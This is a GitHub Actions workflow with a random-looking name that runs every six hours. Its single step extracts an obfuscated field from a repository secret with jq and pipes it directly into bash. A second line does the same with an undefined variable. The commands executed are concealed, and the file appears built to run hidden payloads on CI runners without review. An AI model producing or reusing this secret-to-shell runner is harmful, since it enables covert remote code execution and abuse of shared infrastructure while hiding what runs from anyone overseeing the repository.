name: gunnageterracotta

on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gunnageterracotta
        env:
          l18: ${{ secrets.l18 }}
        run: |
          echo $l18 | jq -r .lpx96 | /bin/bash
          echo $dz238 | jq -r .bqbd069 | /bin/bash

